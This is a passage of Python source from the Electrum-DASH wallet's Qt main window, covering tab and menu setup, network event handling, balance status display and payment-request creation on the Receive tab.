# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals')) tabs.setMinimumSize(1020, 500) tabs.setObjectName("main_window_nav_bar") tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History')) tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(QIcon(":icons/electrum-dash.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) 
self.payment_request_error_signal.connect(self.payment_request_error) # self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed) self.notify_transactions_signal.connect(self.notify_transactions) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['updated', 'new_transaction', 'status', 'banner', 'verified', 'fee'] # 'proposals'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) self.connect_slots(gui_object.timer) self.fetch_alias() backup_file = getattr(self.wallet.storage, 'backup_file', None) if backup_file: backup_message = self.wallet.storage.backup_message self.show_warning(backup_message, title=_('Information')) def on_history(self, b): self.new_fx_history_signal.emit() def on_fx_history(self): self.history_list.refresh_headers() self.history_list.update() self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: 
self.history_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None return self.top_level_window_recurse(override) def diagnostic_name(self): return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename() if self.wallet else "None") def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): if not isinstance(exc_info[1], UserCancelled): traceback.print_exception(*exc_info) self.show_error(str(exc_info[1])) def on_network(self, event, *args): if event == 'updated': self.need_update.set() self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) elif event == 'new_transaction': self.tx_notifications.append(args[0]) self.notify_transactions_signal.emit() elif event in ['status', 'banner', 'verified', 'fee', 'proposals']: # 
Handle in GUI thread self.network_signal.emit(event, args) else: self.print_error("unexpected network message:", event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': self.history_list.update_item(*args) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.do_update_fee() elif event == 'proposals': self.proposals_changed() else: self.print_error("unexpected network_qt signal:", event, args) def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.print_error('close_wallet', self.wallet.storage.path) run_hook('close_wallet', self.wallet) def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.wallet = wallet self.masternode_manager = MasternodeManager(self.wallet, self.config) self.update_recently_visited(wallet.storage.path) # address used to create a dummy transaction and estimate transaction fee self.masternode_manager.send_subscriptions() self.history_list.update() self.address_list.update() self.utxo_list.update() self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized self.notify_transactions() # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) 
def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.print_error("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum-DASH Testnet" if NetworkConstants.TESTNET else "Electrum-DASH" title = '%s %s - %s' % (name, self.wallet.electrum_version, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): self.warn_if_watching_only() extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.can_change_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Dash coins with it."), _("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Information')) def open_wallet(self): wallet_folder = self.get_wallet_folder() filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except (IOError, 
os.error) as reason: self.show_critical(_("Electrum-DASH was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): wallet_folder = self.get_wallet_folder() i = 1 while True: filename = "wallet_%d" % i if filename in os.listdir(wallet_folder): i += 1 else: break full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = 
wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) hist_menu = wallet_menu.addMenu(_("&History")) hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None) hist_menu.addAction("Export", self.export_history_dialog) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) wallet_menu.addSeparator() wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in OSX using this as work around tools_menu.addAction(_("Electrum-DASH preferences") if 
sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-dash.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters()[0] self.pay_to_URI('dash:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum-DASH", _("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum-DASH focus is speed, with low resource usage and simplifying Dash. 
You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Dash system." + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/akhavr/electrum-dash/issues\">https://github.com/akhavr/electrum-dash/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum-DASH (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum-DASH - " + _("Reporting Bugs")) def notify_transactions(self): if not self.network or not self.network.is_connected(): return self.print_error("Notifying GUI") if len(self.tx_notifications) > 0: # Combine the transactions if there are more then three tx_amount = len(self.tx_notifications) if(tx_amount >= 3): total_amount = 0 for tx in self.tx_notifications: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if(v > 0): total_amount += v self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \ % { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)}) self.tx_notifications = [] else: for tx in self.tx_notifications: if tx: self.tx_notifications.remove(tx) is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if(v > 0): self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)}) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum-DASH", message, QIcon(":icons/electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum-DASH", 
                                  message, QSystemTrayIcon.Information, 20000)

    # custom wrappers for getOpenFileName and getSaveFileName, that remember
    # the path selected by the user
    def getOpenFileName(self, title, filter = ""):
        # Open-file dialog starting in (and remembering) the last used dir.
        directory = self.config.get('io_dir', os.path.expanduser('~'))
        fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
        if fileName and directory != os.path.dirname(fileName):
            self.config.set_key('io_dir', os.path.dirname(fileName), True)
        return fileName

    def getSaveFileName(self, title, filename, filter = ""):
        # Save-file dialog pre-filled with *filename*, remembering the dir.
        directory = self.config.get('io_dir', os.path.expanduser('~'))
        path = os.path.join( directory, filename )
        fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
        if fileName and directory != os.path.dirname(fileName):
            self.config.set_key('io_dir', os.path.dirname(fileName), True)
        return fileName

    def connect_slots(self, sender):
        # Hook the GUI timer so timer_actions() runs periodically.
        sender.timer_signal.connect(self.timer_actions)

    def timer_actions(self):
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        # update fee
        if self.require_fee_update:
            self.do_update_fee()
            self.require_fee_update = False

    def format_amount(self, x, is_diff=False, whitespaces=False):
        # Render a duff/satoshi amount with the configured precision.
        return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)

    def format_amount_and_units(self, amount):
        # "<amount> <unit> (<fiat>)"; fiat part only when fx provides one.
        text = self.format_amount(amount) + ' '+ self.base_unit()
        x = self.fx.format_amount_and_units(amount)
        if text and x:
            text += ' (%s)'%x
        return text

    def format_fee_rate(self, fee_rate):
        # fee_unit 0 -> sat/byte, otherwise base unit per kB.
        if self.fee_unit == 0:
            return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
        else:
            return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'

    def get_decimal_point(self):
        # Number of decimal places implied by the selected base unit.
        return self.decimal_point

    def base_unit(self):
        # Map decimal_point -> unit label (body continues on the next
        # source line of this mangled chunk).
        assert self.decimal_point in [2, 5, 8]
        if self.decimal_point == 2:
            return 'uDASH'
        if self.decimal_point == 5:
            return 'mDASH'
        if self.decimal_point == 8:
            return 'DASH'
        raise Exception('Unknown base unit')

    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Keep a DASH amount field and a fiat amount field in sync.

        The `follows` flag on each edit suppresses feedback loops: when one
        field is being updated programmatically in response to the other,
        its textChanged handler returns immediately.
        """

        def edit_changed(edit):
            if edit.follows:
                # Programmatic update in progress — avoid recursion.
                return
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else None
            if rate is None or amount is None:
                # No rate or empty input: blank the opposite field(s).
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False

        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False

    def update_status(self):
        """Refresh the status-bar balance text, tray tooltip and icon."""
        if not self.wallet:
            return

        if self.network is None or not self.network.is_running():
            text = _("Offline")
            icon = QIcon(":icons/status_disconnected.png")

        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                text = _("Synchronizing...")
                icon = QIcon(":icons/status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging (%d blocks)"%server_lag)
                icon = QIcon(":icons/status_lagging.png")
            else:
                # c/u/x = confirmed, unconfirmed, unmatured balances.
                c, u, x = self.wallet.get_balance()
                text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
                if x:
                    text += " [%s unmatured]"%(self.format_amount(x, True).strip())

                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = QIcon(":icons/status_connected.png")
                else:
                    icon = QIcon(":icons/status_connected_proxy.png")
        else:
            text = _("Not connected")
            icon = QIcon(":icons/status_disconnected.png")

        self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        self.status_button.setIcon( icon )

    def update_wallet(self):
        """Refresh status; refresh the tabs too once the wallet is synced
        (or when we are offline and have nothing to wait for)."""
        self.update_status()
        if self.wallet.up_to_date or not self.network or not self.network.is_connected():
            self.update_tabs()

    def update_tabs(self):
        """Refresh every list widget in the main tab set."""
        self.history_list.update()
        self.request_list.update()
        self.address_list.update()
        self.utxo_list.update()
        self.contact_list.update()
        self.invoice_list.update()
        self.update_proposals_tab()
        self.update_completions()

    def create_history_tab(self):
        from .history_list import HistoryList
        self.history_list = l = HistoryList(self)
        l.searchable_list = l
        l.setObjectName("history_container")
        return l

    def show_address(self, addr):
        from . import address_dialog
        d = address_dialog.AddressDialog(self, addr)
        d.exec_()

    def show_transaction(self, tx, tx_desc = None):
        '''tx_desc is set only for txs created in the Send tab'''
        show_transaction(tx, self, tx_desc)

    def create_receive_tab(self):
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)

        self.receive_address_e = ButtonsLineEdit()
        self.receive_address_e.addCopyButton(self.app)
        self.receive_address_e.setReadOnly(True)
        msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.')
        self.receive_address_label = HelpLabel(_('Receiving address'), msg)
        self.receive_address_e.textChanged.connect(self.update_receive_qr)
        self.receive_address_e.setFocusPolicy(Qt.NoFocus)
        grid.addWidget(self.receive_address_label, 0, 0)
        grid.addWidget(self.receive_address_e, 0, 1, 1, -1)

        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 1, 0)
        grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)

        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 2, 0)
        grid.addWidget(self.receive_amount_e, 2, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)

        # Fiat twin of the amount field; hidden unless an fx source is on.
        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)

        self.expires_combo = QComboBox()
        self.expires_combo.addItems([i[0] for i in expiration_values])
        self.expires_combo.setCurrentIndex(3)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        msg = ' '.join([
            _('Expiration date of your request.'),
            _('This information is seen by the recipient if you send them a signed payment request.'),
            _('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'),
            _('The Dash address never expires and will always be part of this Electrum-DASH wallet.'),
        ])
        grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
        grid.addWidget(self.expires_combo, 3, 1)
        # Read-only label shown (in the same cell) for saved requests,
        # replacing the editable combo.
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 3, 1)

        self.save_request_button = QPushButton(_('Save'))
        self.save_request_button.clicked.connect(self.save_payment_request)

        self.new_request_button = QPushButton(_('New'))
        self.new_request_button.clicked.connect(self.new_payment_request)

        self.receive_qr = QRCodeWidget(fixedSize=200)
        self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
        self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
        self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))

        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.save_request_button)
        buttons.addWidget(self.new_request_button)
        grid.addLayout(buttons, 4, 1, 1, 2)

        self.receive_requests_label = QLabel(_('Requests'))

        from .request_list import RequestList
        self.request_list = RequestList(self)

        # layout
        vbox_g = QVBoxLayout()
        vbox_g.addLayout(grid)
        vbox_g.addStretch()

        hbox = QHBoxLayout()
        hbox.addLayout(vbox_g)
        hbox.addWidget(self.receive_qr)

        w = QWidget()
        w.setObjectName("receive_container")
        w.searchable_list = self.request_list
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.receive_requests_label)
        vbox.addWidget(self.request_list)
        vbox.setStretchFactor(self.request_list, 1000)
        return w

    def delete_payment_request(self, addr):
        """Remove the saved payment request for `addr` and refresh the UI."""
        self.wallet.remove_payment_request(addr, self.config)
        self.request_list.update()
        self.clear_receive_tab()

    def get_request_URI(self, addr):
        """Build the BIP21-style payment URI for the saved request at `addr`,
        appending time/exp/name/sig extension parameters when present."""
        req = self.wallet.receive_requests[addr]
        message = self.wallet.labels.get(addr, '')
        amount = req['amount']
        URI = util.create_URI(addr, amount, message)
        if req.get('time'):
            URI += "&time=%d"%req.get('time')
        if req.get('exp'):
            URI += "&exp=%d"%req.get('exp')
        if req.get('name') and
req.get('sig'):
            # Signed request: embed the base58-encoded signature.
            sig = bfh(req.get('sig'))
            sig = bitcoin.base_encode(sig, base=58)
            URI += "&name=" + req['name'] + "&sig="+sig
        return str(URI)

    def sign_payment_request(self, addr):
        """Sign the request at `addr` with the configured alias key, if the
        alias address belongs to this wallet; silently no-op otherwise."""
        alias = self.config.get('alias')
        alias_privkey = None
        if alias and self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            if alias_addr:
                if self.wallet.is_mine(alias_addr):
                    msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                    password = self.password_dialog(msg)
                    if password:
                        try:
                            self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                        except Exception as e:
                            self.show_error(str(e))
                            return
                    else:
                        # User cancelled the password prompt.
                        return
                else:
                    # Alias address is not ours — cannot sign.
                    return

    def save_payment_request(self):
        """Persist the request currently shown in the Receive tab."""
        addr = str(self.receive_address_e.text())
        amount = self.receive_amount_e.get_amount()
        message = self.receive_message_e.text()
        if not message and not amount:
            self.show_error(_('No message or amount'))
            return False
        i = self.expires_combo.currentIndex()
        expiration = list(map(lambda x: x[1], expiration_values))[i]
        req = self.wallet.make_payment_request(addr, amount, message, expiration)
        self.wallet.add_payment_request(req, self.config)
        self.sign_payment_request(addr)
        self.request_list.update()
        self.address_list.update()
        self.save_request_button.setEnabled(False)

    def view_and_paste(self, title, msg, data):
        """Modal dialog showing `data` with a copy-to-clipboard button."""
        dialog = WindowModalDialog(self, title)
        vbox = QVBoxLayout()
        label = QLabel(msg)
        label.setWordWrap(True)
        vbox.addWidget(label)
        pr_e = ShowQRTextEdit(text=data)
        vbox.addWidget(pr_e)
        vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()

    def export_payment_request(self, addr):
        """Serialize the request at `addr` to a BIP70 file chosen by the user."""
        r = self.wallet.receive_requests.get(addr)
        pr = paymentrequest.serialize_request(r).SerializeToString()
        name = r['id'] + '.bip70'
        fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
        if fileName:
            with open(fileName, "wb+") as f:
                f.write(util.to_bytes(pr))
            self.show_message(_("Request saved successfully"))
            self.saved = True
    def new_payment_request(self):
        """Pick (or create) an unused address and load it into the Receive tab."""
        addr = self.wallet.get_unused_address()
        if addr is None:
            if not self.wallet.is_deterministic():
                msg = [
                    _('No more addresses in your wallet.'),
                    _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                    _('If you want to create new addresses, use a deterministic wallet instead.')
                ]
                self.show_message(' '.join(msg))
                return
            # Deterministic wallet: warn before growing past the gap limit.
            if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                return
            addr = self.wallet.create_new_address(False)
        self.set_receive_address(addr)
        self.expires_label.hide()
        self.expires_combo.show()
        self.new_request_button.setEnabled(False)
        # NOTE(review): setFocus(1) passes an int where Qt expects a
        # FocusReason — presumably interpreted as Qt.TabFocusReason; confirm.
        self.receive_message_e.setFocus(1)

    def set_receive_address(self, addr):
        """Show `addr` in the Receive tab with blank description/amount."""
        self.receive_address_e.setText(addr)
        self.receive_message_e.setText('')
        self.receive_amount_e.setAmount(None)

    def clear_receive_tab(self):
        """Reset the Receive tab to the wallet's current receiving address."""
        addr = self.wallet.get_receiving_address() or ''
        self.receive_address_e.setText(addr)
        self.receive_message_e.setText('')
        self.receive_amount_e.setAmount(None)
        self.expires_label.hide()
        self.expires_combo.show()

    def toggle_qr_window(self):
        from .
import qrwindow
        # Lazily create the detached QR window, then toggle its visibility,
        # remembering its geometry across hide/show cycles.
        if not self.qr_window:
            self.qr_window = qrwindow.QR_Window(self)
            self.qr_window.setVisible(True)
            self.qr_window_geometry = self.qr_window.geometry()
        else:
            if not self.qr_window.isVisible():
                self.qr_window.setVisible(True)
                self.qr_window.setGeometry(self.qr_window_geometry)
            else:
                self.qr_window_geometry = self.qr_window.geometry()
                self.qr_window.setVisible(False)
        self.update_receive_qr()

    def show_send_tab(self):
        self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))

    def show_receive_tab(self):
        self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))

    def receive_at(self, addr):
        """Switch to the Receive tab showing `addr` (ignores invalid input)."""
        if not bitcoin.is_address(addr):
            return
        self.show_receive_tab()
